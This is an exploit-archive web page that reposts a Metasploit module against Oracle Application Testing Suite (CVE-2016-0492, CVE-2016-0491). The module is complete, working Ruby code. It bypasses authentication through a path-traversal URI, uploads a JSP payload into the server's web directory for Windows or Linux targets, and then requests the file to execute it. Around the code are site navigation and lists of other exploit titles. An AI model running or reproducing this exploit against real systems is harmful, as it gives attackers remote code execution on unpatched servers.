首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Oracle ATS Arbitrary File Upload
来源:metasploit.com 作者:wvu 发布时间:2016-05-30  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
 
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle ATS Arbitrary File Upload',
      'Description'    => %q{
        This module exploits an authentication bypass and arbitrary file upload
        in Oracle Application Testing Suite (OATS), version 12.4.0.2.0 and
        unknown earlier versions, to upload and execute a JSP shell.
      },
      'Author'         => [
        'Zhou Yu', # Proof of concept
        'wvu'      # Metasploit module
      ],
      'References'     => [
        %w{CVE 2016-0492}, # Auth bypass
        %w{CVE 2016-0491}, # File upload
        %w{EDB 39691}      # PoC
      ],
      'DisclosureDate' => 'Jan 20 2016',
      'License'        => MSF_LICENSE,
      'Platform'       => %w{win linux},
      'Arch'           => ARCH_JAVA,
      'Privileged'     => true,
      'Targets'        => [
        ['OATS <= 12.4.0.2.0 (Windows)', 'Platform' => 'win'],
        ['OATS <= 12.4.0.2.0 (Linux)',   'Platform' => 'linux']
      ],
      'DefaultTarget'  => 0
    ))
 
    register_options([
      Opt::RPORT(8088)
    ])
  end
 
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/admin/Login.do'
    )
 
    if res && res.body.include?('12.4.0.2.0')
      CheckCode::Appears
    else
      CheckCode::Safe
    end
  end
 
  def exploit
    print_status("Uploading JSP shell to #{jsp_path}")
    upload_jsp_shell
    print_status("Executing JSP shell: #{full_uri}olt/pages/#{jsp_filename}")
    exec_jsp_shell
  end
 
  def upload_jsp_shell
    mime = Rex::MIME::Message.new
    mime.add_part('.jsp', nil, nil, 'form-data; name="storage.extension"')
    mime.add_part(jsp_filename, nil, nil, 'form-data; name="fileName1"')
    mime.add_part('', nil, nil, 'form-data; name="fileName2"') # Not needed
    mime.add_part('', nil, nil, 'form-data; name="fileName3"') # Not needed
    mime.add_part('', nil, nil, 'form-data; name="fileName4"') # Not needed
    mime.add_part('*', nil, nil, 'form-data; name="fileType"')
    mime.add_part(payload.encoded, 'text/plain', nil,
                  %Q{form-data; name="file1"; filename="#{jsp_filename}"})
    mime.add_part('Default', nil, nil, 'form-data; name="storage.repository"')
    mime.add_part('.', nil, nil, 'form-data; name="storage.workspace"')
    mime.add_part(jsp_directory, nil, nil, 'form-data; name="directory"')
 
    register_files_for_cleanup(jsp_path)
 
    send_request_cgi(
      'method' => 'POST',
      'uri'    => '/olt/Login.do/../../olt/UploadFileUpload.do',
      'ctype'  => "multipart/form-data; boundary=#{mime.bound}",
      'data'   => mime.to_s
    )
  end
 
  def exec_jsp_shell
    send_request_cgi(
      'method' => 'GET',
      'uri'    => "/olt/pages/#{jsp_filename}"
    )
  end
 
  def jsp_directory
    case target['Platform']
    when 'win'
      '..\\oats\\servers\\AdminServer\\tmp\\_WL_user\\oats_ee\\1ryhnd\\war\\pages'
    when 'linux'
      '../oats/servers/AdminServer/tmp/_WL_user/oats_ee/1ryhnd/war/pages'
    end
  end
 
  def jsp_filename
    @jsp_filename ||= Rex::Text.rand_text_alpha(8) + '.jsp'
  end
 
  def jsp_path
    jsp_directory + "#{target['Platform'] == 'win' ? '\\' : '/'}" + jsp_filename
  end
 
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·Yahoo! Messenger Webcam 8.1 Ac
·VideoScript 3.0 <= 4.0.1.50 Of
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Teampass 2.1.25 Arbitrary File
·Ubiquiti airOS Arbitrary File
·Teampass 2.1.25 Unauthenticate
·Micro Focus Rumba+ 9.4 - Multi
·Linknat VOS3000/VOS2009 SQL In
·HP Data Protector A.09.00 - Ar
·Job Script by Scubez - Remote
·WordPress Ninja Forms Unauthen
·Operation Technology ETAP 14.1
·MySQL 5.5.45 - procedure analy
·Operation Technology ETAP 14.1
·FlatPress 1.0.3 - CSRF Arbitra
  推荐广告
CopyRight © 2002-2020 VFocuS.Net All Rights Reserved